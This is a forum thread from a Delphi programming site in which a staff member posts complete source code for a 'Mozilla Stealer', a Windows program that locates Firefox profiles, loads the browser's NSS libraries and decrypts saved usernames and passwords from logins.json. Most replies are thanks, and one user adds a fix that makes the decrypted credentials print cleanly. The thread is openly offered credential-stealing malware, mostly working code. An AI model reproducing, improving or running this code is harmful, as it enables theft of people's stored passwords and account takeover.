1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
  2. Donation with Paypal!!!

    Go to your paypal account and send directly donation to [email protected]

    1 month - 10 $ - Standart VIP

    6 months - 20 $- Standart VIP

    1 year - 30 $- Standart VIP

    2 years - 50 $- Standart VIP

    Gold member for life - 150 $- Standart VIP

    High Vip (Standart VIP include) group please send PM or email to [email protected] for info

    After Donation please send email to [email protected]

  3. Donation Ways 2020


    Paysend
  4. Telegram

  5. Delphifan Magazine
Dismiss Notice

Donation with Paypal!!!

Go to your paypal account and send directly donation to [email protected]

1 month - 10 $ - Standart VIP

6 months - 20 $- Standart VIP

1 year - 30 $- Standart VIP

2 years - 50 $- Standart VIP

Gold member for life - 150 $- Standart VIP

High Vip (Standart VIP include) group please send PM or email to [email protected] for info

After Donation please send email to [email protected]

Dismiss Notice
For open hidden message no need write thanks, thank etc. Enough is click to like button on right side of thread.

Mozilla Stealer Project Source Code

Discussion in 'Delphi Programming' started by AdminDF, Apr 10, 2015.

  1. AdminDF
    Online

    AdminDFAdminDF is a Verified Member Delphifan Staff Member DF Staff

    Code:
    program Project2;
     
    {$APPTYPE CONSOLE}
     
    uses
      MozillaStealer;
     
    begin
      writeln(getMozilla());
      readln;
    end.
    Unit :
    
    unit mozillastealer;
     
    interface
     
    uses
      windows;
     
    function getMozilla(): string;
     
     
    implementation
     
    var
      version,
      FireFoxPath: string;
     
    function GetFileList(const Path: String): string;
    var a: Cardinal;
       fa: _WIN32_FIND_DATAA;
    begin
    result:='';
    TRY
    a:=FindFirstFile(PansiChar(path+PChar('\*.*')),fa);
    while FindNextFile(a,fa) do
    result:=result+fa.cFileName+#13#10;
    EXCEPT
    END;
    end;
     
    procedure GetFFInfos;
    begin
      FireFoxPath:='';
    TRY
      if pos('Mozilla Firefox', GetFileList('c:\Program Files (x86)\'))<>0 then FireFoxPath:='C:\Program Files (x86)\Mozilla Firefox\';
      if pos('Mozilla Firefox', GetFileList('c:\Program Files'))<>0 then FireFoxPath:='C:\Program Files\Mozilla Firefox\';
    EXCEPT
    END;
    end;
     
     
     
    Function Splitter(Texto, Delimitador: String; Indice: integer): string;
    var
    DelimiPos, i: integer;
    begin
    for i:= 1 to indice do
      begin
        DelimiPos:= pos(Delimitador,Texto);
        if DelimiPos <> 0 then
          Delete(Texto, 1, DelimiPos + length(Delimitador) -1);
      end;
     
    DelimiPos:= pos(Delimitador,Texto);
     
    if DelimiPos <> 0 then
      Texto:= Copy(Texto,1,delimipos -1);
     
    SetLength(Result, Length(Texto));
    Result:= Texto;
    end;
     
     
    function Pars(T_, ForS, _T: string): string;
    var a, b:integer;
    begin
    Result := '';
    if (T_='') or (ForS='') or (_T='') then Exit;
    a:=Pos(T_, ForS);
    if a=0 then Exit else a:=a+Length(T_);
    ForS:=Copy(ForS, a, Length(ForS)-a+1);
    b:=Pos(_T, ForS);
    if b>0 then
    Result:=Copy(ForS, 1, b - 1);
    end;
     
     
     
    Function GetFile(const FileName : AnsiString) : AnsiString;
    Var
     F : File;
     FSize : Longint;
    begin
      Result:='';
      if GetFileAttributes(Pchar(FileName)) = DWORD($FFFFFFFF) then exit;
      FileMode:=0;
      AssignFile ( F, FileName);
      Reset(F, 1);
      FSize:=FileSize(F);
      SetLength(Result,FSize);
      BHIDE-THANKSRead(F, Result[1],FSize);
      CloseFile(F);
      FileMode:=2;
    end;
     
     
     
     
    function ParseMozJSON(j: string): string;
    var
    data, it, ress: string;
    begin
    data:=GetFile(j);
    data:=Pars(',"logins":[{',data,'}],"disabledHosts":[],"version":1}');
    while pos(',"hostname":"', data)<> 0 do
      begin
       it:= Pars(',"hostname":"', data, 'timesUsed":');
       ress:=ress + copy(it, 1, pos('","',it)-1);
       delete(it, 0, pos('encryptedUsername":"', it));
       ress:=ress + '<|>'+Pars('encryptedUsername":"',it,'","');
       delete(it, 0, pos('encryptedPassword":"', it));
       ress:=ress + '<|>'+Pars('encryptedPassword":"',it,'","')+#13#10;
       delete(data, 1, pos('timesUsed":',data));
    end;
    result:=ress;
    end;
     
     
    function getMozilla(): string;
    type
      TSECItem = packed record
      SECItemType: dword;
      SECItemData: pchar;
      SECItemLen: dword;
    end;
      PSECItem = ^TSECItem;
    var
      NSSModule: THandle;
      hToken: THandle;
      NSS_Init: function(configdir: pchar): dword; cdecl;
      NSSBase64_DecodeBuffer: function(arenaOpt: pointer; outItemOpt: PSECItem; inStr: pchar; inLen: dword): dword; cdecl;
      PK11_GetInternalKeySlot: function: pointer; cdecl;
      PK11_Authenticate: function(slot: pointer; loadCerts: boolean; wincx: pointer): dword; cdecl;
      PK11SDR_Decrypt: function(data: PSECItem; result: PSECItem; cx: pointer): dword; cdecl;
      NSS_Shutdown: procedure; cdecl;
      PK11_FreeSlot: procedure(slot: pointer); cdecl;
      ProfilePath: array [0..MAX_PATH] of char;
      ProfilePathLen: dword;
      FirefoxProfilePath: pchar;
      MainProfile: array [0..MAX_PATH] of char;
      MainProfilePath: pchar;
      EncryptedSECItem: TSECItem;
      DecryptedSECItem: TSECItem;
      KeySlot: pointer;
      i:integer;
      username, password: string;
      V: Extended;
      buffer, huyufer: string;
      a: Cardinal;
      fa: _WIN32_FIND_DATAA;
    begin
    TRY
     
      try
    GetFFInfos;
    except
    end;
     
    try
    if FireFoxPath = '' then exit;
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'mozglue.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'mozcrt19.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'mozutils.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'nspr4.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'plc4.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'plds4.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'nssutil3.dll'));
    except
    end;
     
    try
      NSSModule := LoadLibrary(pchar(FirefoxPath + 'nss3.dll'));
    except
    end;
     
    try
      @NSS_Init := GetProcAddress(NSSModule, pchar('NSS_Init'));
    except
    end;
     
    try
      @NSSBase64_DecodeBuffer := GetProcAddress(NSSModule, pchar('NSSBase64_DecodeBuffer'));
    except
    end;
     
    try
      @PK11_GetInternalKeySlot := GetProcAddress(NSSModule, pchar('PK11_GetInternalKeySlot'));
    except
    end;
     
    try
      @PK11_Authenticate := GetProcAddress(NSSModule, pchar('PK11_Authenticate'));
    except
    end;
     
    try
      @PK11SDR_Decrypt := GetProcAddress(NSSModule, pchar('PK11SDR_Decrypt'));
    except
    end;
     
    try
      @NSS_Shutdown := GetProcAddress(NSSModule, pchar('NSS_Shutdown'));
    except
    end;
     
    try
      @PK11_FreeSlot := GetProcAddress(NSSModule, pchar('PK11_FreeSlot'));
    except
    end;
     
    try
      OpenProcessToken(GetCurrentProcess, TOKEN_QUERY, hToken);
    except
    end;
     
    try
      ProfilePathLen := MAX_PATH;
    except
    end;
     
    try
      ZeroMemory(@ProfilePath, MAX_PATH);
    except
    end;
     
    try
      GetEnvironmentVariable('APPDATA', ProfilePath, ProfilePathLen);
    except
    end;
     
    try
      FirefoxProfilePath := pchar(profilePath +'\Mozilla\Firefox\profiles.ini');
    except
    end;
     
    try
      GetPrivateProfileString('Profile0', 'Path', '', MainProfile, MAX_PATH, FirefoxProfilePath);
    except
    end;
     
     
    a:=FindFirstFile(PansiChar(profilePath + '\Mozilla\Firefox\Profiles\'+PChar('\*.*')),fa);
          while FindNextFile(a,fa) do
            if GetFileAttributes(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json')) <> DWORD($FFFFFFFF) then
              try
     
     
    if NSS_Init(pchar(profilePath + '\Mozilla\Firefox\' + mainProfile)) = 0 then
        begin
          KeySlot := PK11_GetInternalKeySlot;
          if KeySlot <> nil then
          begin
            if PK11_Authenticate(KeySlot, True, nil) = 0 then
            begin
            huyufer:=ParseMozJSON(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json'));
            while pos(#13#10, huyufer)<>0 do
            BEGIN
                buffer:=copy(huyufer, 0, pos(#13#10, huyufer));
                delete(huyufer, 1, pos(#13#10, huyufer)+1);
                ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem));
                ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem));
     
                result := result + 'URL:'+#$9+Splitter(buffer, '<|>', 0) + #13#10;
                username:= Splitter(buffer, '<|>', 1);
                Password := Splitter(buffer, '<|>', 2);
     
     
                NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Username), Length(Username));
     
                PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
                Result := result + 'LOG:'+#$9+DecryptedSECItem.SECItemData + #13#10;
     
     
                ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem));
                ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem));
     
     
                NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Password), Length(Password));
                PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
                Result := result + 'PWD:'+#$9+DecryptedSECItem.SECItemData  + #13#10+ #13#10;
              END;
            end else result:= result + '';
            PK11_FreeSlot(KeySlot);
          end else
          result:= result + '';
          NSS_Shutdown;
        end else
        result:= result + '';
    except
    end;
    EXCEPT
    END;
    end;
     
    end.
    Hidden Content:
    **Hidden Content: You must click 'Like' before you can see the hidden data contained here.**
     
    jccp5 likes this.
  2. salimouu
    Offline

    salimouu DF Junior

    RE:

    Thanks
     
  3. jekl
    Offline

    jekl DF Junior

    RE:

    thanks
     
  4. dynamo
    Offline

    dynamo DF Expert

    RE:

    Thanks
     
  5. alexp25
    Online

    alexp25 Guest

    RE:

    Thanks
     
  6. Koru
    Online

    Koru Guest

    RE:

    thanks
     
  7. DIgitalNam
    Online

    DIgitalNam DF Junior DF Gold User

  8. marciords
    Offline

    marciords DF Member

    RE:

    thanks
     
  9. rikk
    Online

    rikk Guest

    Thank you
     
  10. chimotoki
    Offline

    chimotoki DF Junior

    thank you
     
  11. 2076874465
    Offline

    2076874465 DF Member

    RE:

    Delphifan Silver Group
     
  12. jccjr_sp
    Online

    jccjr_sp Guest

    RE:

    coolllll
     
  13. brst
    Online

    brst Guest

    gratooo
     
  14. nnlscxlm
    Offline

    nnlscxlm DF Member

    Interesting! I'm a bit shocked how easy it is to steal stored passwords from Firefox.

    In the demo, the decrypted strings are shown with trailing garbage. To fix it you can do something like

    var
    ...
      value: string;
    ...
      SetString(value, DecryptedSECItem.SECItemData, DecryptedSECItem.SECItemLen);
      Result := result + 'LOG:'+#$9+ value + #13#10;
     
     

Share This Page